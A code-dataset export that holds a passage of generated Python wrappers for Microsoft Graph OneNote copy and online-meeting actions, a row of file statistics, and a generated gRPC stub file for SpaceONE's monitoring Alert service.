onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
section_group_id=section_group_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectionspagesparentnotebooksectiongroupssection_copy_to_section_group(client,
user_id,
onenote_section_id,
onenote_page_id,
section_group_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
section_group_id=section_group_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectionspagesparentnotebooksection_copy_to_notebook(client,
user_id,
onenote_section_id,
onenote_page_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectionspagesparentnotebooksection_copy_to_section_group(client,
user_id,
onenote_section_id,
onenote_page_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectionspagesparentsection_copy_to_notebook(client,
user_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectionspagesparentsection_copy_to_section_group(client,
user_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotesectionsparentnotebook_copy_notebook(client,
user_id,
onenote_section_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotesectionsparentnotebooksectiongroupsparentnotebook_copy_notebook(client,
user_id,
onenote_section_id,
section_group_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
section_group_id=section_group_id,
body=body)
def usersactions_usersonenotesectionsparentnotebooksectiongroupssection_copy_to_notebook(client,
user_id,
onenote_section_id,
section_group_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
section_group_id=section_group_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectionsparentnotebooksectiongroupssection_copy_to_section_group(client,
user_id,
onenote_section_id,
section_group_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_section_id=onenote_section_id,
section_group_id=section_group_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectionsparentnotebooksection_copy_to_notebook(client,
user_id,
onenote_section_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectionsparentnotebooksection_copy_to_section_group(client,
user_id,
onenote_section_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectionsparentsectiongroupparentnotebook_copy_notebook(client,
user_id,
onenote_section_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotesectionsparentsectiongroupparentnotebooksection_copy_to_notebook(client,
user_id,
onenote_section_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectionsparentsectiongroupparentnotebooksection_copy_to_section_group(client,
user_id,
onenote_section_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectionsparentsectiongroupsection_copy_to_notebook(client,
user_id,
onenote_section_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotesectionsparentsectiongroupsection_copy_to_section_group(client,
user_id,
onenote_section_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
onenote_section_id=onenote_section_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonlinemeeting_create_or_get(client,
user_id,
chat_info=None,
end_date_time=None,
external_id=None,
start_date_time=None,
subject=None,
attendees=None,
organizer=None):
body = {}
if chat_info is not None:
body['chat_info'] = chat_info
if end_date_time is not None:
body['end_date_time'] = end_date_time
if external_id is not None:
body['external_id'] = external_id
if start_date_time is not None:
body['start_date_time'] = start_date_time
if subject is not None:
body['subject'] = subject
body['participants'] = {}
if attendees is not None:
body['participants']['attendees'] = attendees
if organizer is not None:
body['participants']['organizer'] = organizer
if len(body['participants']) == 0:
del body['participants']
return client.create_or_get(user_id=user_id,
body=body)
| 53.115501 | 140 | 0.399711 | 26,931 | 350,881 | 4.841001 | 0.013702 | 0.085601 | 0.078904 | 0.113973 | 0.954469 | 0.94327 | 0.935639 | 0.924363 | 0.916202 | 0.910457 | 0 | 0.001774 | 0.551737 | 350,881 | 6,605 | 141 | 53.123543 | 0.827112 | 0.001425 | 0 | 0.930915 | 0 | 0 | 0.054663 | 0.009911 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.003313 | 0.006461 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
05cd8b8ad40b19073935a5b157dd5208874c560d | 24,002 | py | Python | venv/lib/python3.8/site-packages/spaceone/api/monitoring/v1/alert_pb2_grpc.py | choonho/plugin-prometheus-mon-webhook | afa7d65d12715fd0480fb4f92a9c62da2d6128e0 | [
"Apache-2.0"
] | null | null | null | venv/lib/python3.8/site-packages/spaceone/api/monitoring/v1/alert_pb2_grpc.py | choonho/plugin-prometheus-mon-webhook | afa7d65d12715fd0480fb4f92a9c62da2d6128e0 | [
"Apache-2.0"
] | null | null | null | venv/lib/python3.8/site-packages/spaceone/api/monitoring/v1/alert_pb2_grpc.py | choonho/plugin-prometheus-mon-webhook | afa7d65d12715fd0480fb4f92a9c62da2d6128e0 | [
"Apache-2.0"
] | null | null | null | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from google.protobuf import struct_pb2 as google_dot_protobuf_dot_struct__pb2
from spaceone.api.monitoring.v1 import alert_pb2 as spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2
class AlertStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.create = channel.unary_unary(
'/spaceone.api.monitoring.v1.Alert/create',
request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.CreateAlertRequest.SerializeToString,
response_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
)
self.update = channel.unary_unary(
'/spaceone.api.monitoring.v1.Alert/update',
request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.UpdateAlertRequest.SerializeToString,
response_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
)
self.update_state = channel.unary_unary(
'/spaceone.api.monitoring.v1.Alert/update_state',
request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.UpdateAlertStateRequest.SerializeToString,
response_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
)
self.merge = channel.unary_unary(
'/spaceone.api.monitoring.v1.Alert/merge',
request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.MergeAlertRequest.SerializeToString,
response_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
)
self.snooze = channel.unary_unary(
'/spaceone.api.monitoring.v1.Alert/snooze',
request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.SnoozeAlertRequest.SerializeToString,
response_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
)
self.add_responder = channel.unary_unary(
'/spaceone.api.monitoring.v1.Alert/add_responder',
request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertResponderRequest.SerializeToString,
response_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
)
self.remove_responder = channel.unary_unary(
'/spaceone.api.monitoring.v1.Alert/remove_responder',
request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertResponderRequest.SerializeToString,
response_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
)
self.add_project_dependency = channel.unary_unary(
'/spaceone.api.monitoring.v1.Alert/add_project_dependency',
request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertProjectDependencyRequest.SerializeToString,
response_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
)
self.remove_project_dependency = channel.unary_unary(
'/spaceone.api.monitoring.v1.Alert/remove_project_dependency',
request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertProjectDependencyRequest.SerializeToString,
response_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
)
self.delete = channel.unary_unary(
'/spaceone.api.monitoring.v1.Alert/delete',
request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.get = channel.unary_unary(
'/spaceone.api.monitoring.v1.Alert/get',
request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.GetAlertRequest.SerializeToString,
response_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
)
self.list = channel.unary_unary(
'/spaceone.api.monitoring.v1.Alert/list',
request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertQuery.SerializeToString,
response_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertsInfo.FromString,
)
self.stat = channel.unary_unary(
'/spaceone.api.monitoring.v1.Alert/stat',
request_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertStatQuery.SerializeToString,
response_deserializer=google_dot_protobuf_dot_struct__pb2.Struct.FromString,
)
class AlertServicer(object):
"""Missing associated documentation comment in .proto file."""
def create(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def update(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def update_state(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def merge(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def snooze(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_responder(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def remove_responder(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_project_dependency(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def remove_project_dependency(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def delete(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def get(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def list(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def stat(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_AlertServicer_to_server(servicer, server):
rpc_method_handlers = {
'create': grpc.unary_unary_rpc_method_handler(
servicer.create,
request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.CreateAlertRequest.FromString,
response_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.SerializeToString,
),
'update': grpc.unary_unary_rpc_method_handler(
servicer.update,
request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.UpdateAlertRequest.FromString,
response_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.SerializeToString,
),
'update_state': grpc.unary_unary_rpc_method_handler(
servicer.update_state,
request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.UpdateAlertStateRequest.FromString,
response_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.SerializeToString,
),
'merge': grpc.unary_unary_rpc_method_handler(
servicer.merge,
request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.MergeAlertRequest.FromString,
response_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.SerializeToString,
),
'snooze': grpc.unary_unary_rpc_method_handler(
servicer.snooze,
request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.SnoozeAlertRequest.FromString,
response_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.SerializeToString,
),
'add_responder': grpc.unary_unary_rpc_method_handler(
servicer.add_responder,
request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertResponderRequest.FromString,
response_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.SerializeToString,
),
'remove_responder': grpc.unary_unary_rpc_method_handler(
servicer.remove_responder,
request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertResponderRequest.FromString,
response_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.SerializeToString,
),
'add_project_dependency': grpc.unary_unary_rpc_method_handler(
servicer.add_project_dependency,
request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertProjectDependencyRequest.FromString,
response_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.SerializeToString,
),
'remove_project_dependency': grpc.unary_unary_rpc_method_handler(
servicer.remove_project_dependency,
request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertProjectDependencyRequest.FromString,
response_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.SerializeToString,
),
'delete': grpc.unary_unary_rpc_method_handler(
servicer.delete,
request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'get': grpc.unary_unary_rpc_method_handler(
servicer.get,
request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.GetAlertRequest.FromString,
response_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.SerializeToString,
),
'list': grpc.unary_unary_rpc_method_handler(
servicer.list,
request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertQuery.FromString,
response_serializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertsInfo.SerializeToString,
),
'stat': grpc.unary_unary_rpc_method_handler(
servicer.stat,
request_deserializer=spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertStatQuery.FromString,
response_serializer=google_dot_protobuf_dot_struct__pb2.Struct.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'spaceone.api.monitoring.v1.Alert', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Alert(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def create(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/create',
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.CreateAlertRequest.SerializeToString,
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def update(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/update',
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.UpdateAlertRequest.SerializeToString,
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def update_state(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/update_state',
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.UpdateAlertStateRequest.SerializeToString,
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def merge(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/merge',
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.MergeAlertRequest.SerializeToString,
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def snooze(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/snooze',
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.SnoozeAlertRequest.SerializeToString,
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def add_responder(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/add_responder',
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertResponderRequest.SerializeToString,
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def remove_responder(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/remove_responder',
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertResponderRequest.SerializeToString,
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def add_project_dependency(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/add_project_dependency',
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertProjectDependencyRequest.SerializeToString,
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def remove_project_dependency(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/remove_project_dependency',
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertProjectDependencyRequest.SerializeToString,
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def delete(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/delete',
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def get(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/get',
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.GetAlertRequest.SerializeToString,
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def list(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/list',
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertQuery.SerializeToString,
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertsInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def stat(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/stat',
spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertStatQuery.SerializeToString,
google_dot_protobuf_dot_struct__pb2.Struct.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
